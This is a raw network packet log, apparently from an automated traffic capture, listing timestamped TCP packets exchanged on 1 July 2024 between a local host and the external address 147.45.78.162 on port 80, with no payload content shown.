Jul 1, 2024 13:02:11.842122078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.842133045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.842145920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.842173100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845164061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845226049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845251083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845262051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845287085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845305920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845498085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845534086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845582962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845621109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845752001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845763922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845777035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.845793962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.845822096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.848602057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848661900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.848674059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848689079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848709106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.848725080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.848848104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848860025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848871946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848891020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.848898888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.848927975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.849201918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.849246979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.850830078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.850879908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.850903034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.850914955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.850944996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.851154089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.851165056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.851176977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.851201057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.851219893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.851414919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.851424932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.851461887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.863883972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.863951921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.863961935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864007950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864022017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864053965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864065886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864093065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864293098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864342928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864379883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864389896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864427090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864701986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864712000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864723921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864737034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.864742041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.864772081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.865278959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865288973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865300894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865312099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865324020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.865329981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865340948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.865348101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.865369081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.865391016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.866122007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866166115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.866214991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866226912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866236925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866249084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.866254091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866264105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866271019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.866280079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.866302013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.866317034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.867080927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.867093086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.867104053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.867130041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.867157936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.878261089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878287077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878298044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878308058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878319025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878381014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.878416061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.878592968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878603935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878614902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878627062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.878632069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878643036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.878654003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.878683090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.879276991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.879287958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.879298925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.879312038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.879326105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.879349947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.901998043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902163982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.902224064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902241945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902261019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902272940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902282953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902331114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.902621031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.902672052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.907972097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908041954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.908051968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908061981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908091068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.908107996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.908236980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908246994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908288002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.908550024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908560038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908570051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.908590078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.908607006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913189888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913254023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913268089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913300037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913321018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913356066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913424015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913434982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913456917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913470984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913671970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913681984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913691998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.913700104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.913717985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.922741890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.922810078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.922863007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.922874928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.922916889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.923052073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.923106909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.923183918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.923196077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.923207045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.923234940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.923243999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.923253059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.923261881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.923278093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.926877022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.926923990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.926987886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.926999092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927027941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.927045107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.927212000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927226067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927254915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.927469969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927479982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927489996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.927496910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.927501917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.927542925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.930910110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.930999994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931010008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931114912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.931252003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931262016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931272984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931284904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.931322098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.931339025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.936256886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936345100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936353922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.936364889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936386108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.936400890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.936670065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936681986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936692953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936700106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.936732054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.936753988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.939858913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.939924002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.939944029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.939954996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.939980030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.939994097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.940133095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.940145016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.940187931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.940411091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.940423012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.940433979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.940455914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.940471888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.943233013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943279982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943295956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.943315029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.943325996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943365097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.943469048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943480968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943521023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.943694115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943706036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943711996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.943870068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.945713997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.945765018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.945796967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.945807934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.945837975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.945851088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.946053028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.946063995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.946075916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.946086884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.946098089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.946105957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.946125984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.946141958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.958481073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958559990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.958565950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958575964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958606958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.958743095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958754063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958765984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.958784103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.958811998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.959124088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959132910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959146023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959167957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.959192038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.959536076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959547997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959558964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959572077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.959578991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.959604025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.959625959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.960071087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960083008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960093021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960102081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960110903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.960119009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960125923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.960135937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960146904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.960154057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.960181952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961000919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961013079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961024046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961034060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961041927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961054087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961065054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961074114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961083889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961096048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961112022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961142063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961895943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961909056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961919069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.961936951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.961955070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.972649097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.972683907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.972712994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.972728014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.972923040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.972949982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.972956896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973058939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973067999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973079920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973089933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973098040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973113060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973134041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973611116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973620892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973630905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973645926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973661900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.973973989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973984003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.973994970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.974004030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.974009037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.974036932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.996723890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996740103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996752024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996855021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.996906042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996917963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996931076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996943951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996952057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.996962070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.996999025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.997025967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.002490044 CEST	80	49705	147.45.78.162	192.168.2.5
